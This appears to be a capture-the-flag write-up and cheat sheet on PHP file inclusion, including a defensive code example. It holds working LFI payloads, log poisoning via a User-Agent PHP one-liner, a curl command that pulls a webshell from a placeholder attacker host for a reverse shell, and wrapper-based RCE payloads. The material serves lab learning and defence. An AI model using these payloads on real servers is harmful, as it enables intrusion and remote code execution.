File Inclusion Vulnerabilities (LFI and RFI)

Difference between File Inclusion and Directory Traversal

  • Directory Traversal can obtain the contents of a file outside of the web server's web root, but it cannot execute code.

  • A File Inclusion vulnerability allows an attacker to include a file in the application's running code.

  • This means file inclusion vulnerabilities can be used to execute local or remote files, while directory traversal only allows reading a file's contents.

LFI + Log Poisoning to get initial access (e.g. THM Dogcat room)

1. Find the vulnerable parameter:

http://10.10.247.210/?view=dog

2. Modify the URL with the payload

http://10.10.247.210/?view=dog/../../../../../etc/passwd

I used ?view=../../../../etc/passwd but it did not work; the page alerted "only dog and cat are allow", so I changed the payload to the one above.

3. Read the index.php source using the php://filter wrapper and decode the base64 string

  • Normally index.php is executed and its source is not shown, so we use the base64-encode filter to read the PHP code of the index page.

http://10.10.247.210/?view=php://filter/convert.base64-encode/resource=dog/../index

There are a couple of interesting things to note here. First, there is an $ext variable that keeps appending a .php extension to our input, which accounts for the previous errors. Second, as long as our input to view contains the string dog or cat, we are good to go. Now that we know a bit more about the source code at play, let's try some path traversal.

http://10.10.247.210/?view=dog/../../../../../etc/passwd&ext=

Finally I can read /etc/passwd.

There are many ways to get RCE, but the two most common are the PHP wrapper and log poisoning techniques.
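To show why dog/../../../../../etc/passwd passes while ../../../../etc/passwd does not, and what the fix looks like, here is an added example that reconstructs the behaviour described above beside a hardened version. It is not the room's real index.php; the ./pages/dog.php and ./pages/cat.php layout is assumed.

```php
<?php
// Added example, not the Dogcat room's actual source: a reconstruction of the
// behaviour the write-up describes (substring check on "dog"/"cat" plus a
// caller-controllable $ext), next to a hardened version.
// Assumed layout: the two legitimate pages are ./pages/dog.php and ./pages/cat.php.

// Vulnerable: only checks that the value CONTAINS "dog" or "cat", and lets the
// caller blank the ".php" suffix with "&ext=" in the query string.
function includeViewVulnerable(array $get): void
{
    $ext = isset($get['ext']) ? $get['ext'] : '.php';
    if (!isset($get['view'])) {
        return;
    }
    if (strpos($get['view'], 'dog') !== false || strpos($get['view'], 'cat') !== false) {
        // "dog/../../../../etc/passwd" passes the check; "../../etc/passwd" does not.
        // "php://filter/convert.base64-encode/resource=dog/../index" passes too.
        include $get['view'] . $ext;
    } else {
        echo 'Sorry, only dogs or cats are allowed.';
    }
}

// Hardened: the parameter is never used as a path. It is an exact key into a
// fixed map, so traversal, stream wrappers (php://, data://, expect://) and the
// ext trick have nothing to act on. Pair this with allow_url_include=Off in
// php.ini so remote inclusion is also disabled at the interpreter level.
function includeViewSafe(array $get): void
{
    $pages = [
        'dog' => __DIR__ . '/pages/dog.php',
        'cat' => __DIR__ . '/pages/cat.php',
    ];
    $view = $get['view'] ?? 'dog';
    // is_string() rejects ?view[]=... which would otherwise reach array_key_exists()
    if (!is_string($view) || !array_key_exists($view, $pages)) {
        http_response_code(400);
        echo 'Sorry, only dogs or cats are allowed.';
        return;
    }
    include $pages[$view];
}

includeViewSafe($_GET);
```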

4. Log Poisoning

  • Access the apache2 log through the LFI-vulnerable parameter and check that the User-Agent value is included in the log entry

http://10.10.247.210/?view=dog/../../../../../var/log/apache2/access.log&ext=
  • Modify the User-Agent header to inject a PHP one-liner and add a cmd parameter to the request

User-Agent: Mozilla/5.0 <?php echo system($_GET['cmd']); ?>
  • Add the cmd parameter with a command

http://10.10.247.210/?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd=ls

Finally we got RCE.

5. Get a reverse shell using nc

  • Choose /usr/share/webshells/php/php-reverse-shell.php and change the IP and port to those of the nc listener

  • Start a Python HTTP server

python3 -m http.server 80
  • Send the curl request through the cmd parameter using the RCE

curl -A "<?php file_put_contents('shell.php',file_get_contents('http://{ATTACKER_IP}/shell.php'))?>" -s http://{VICTIM_IP}
  • Check the nc listener to get the reverse shell

PHP wrapper for LFI to RCE Transformation

Please read the details about PHP wrappers at the following link:

php://filter (case insensitive)

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

data://

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

expect://

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

php://input (Most Popular)

curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v

zip://, phar:// and other wrappers are also available.
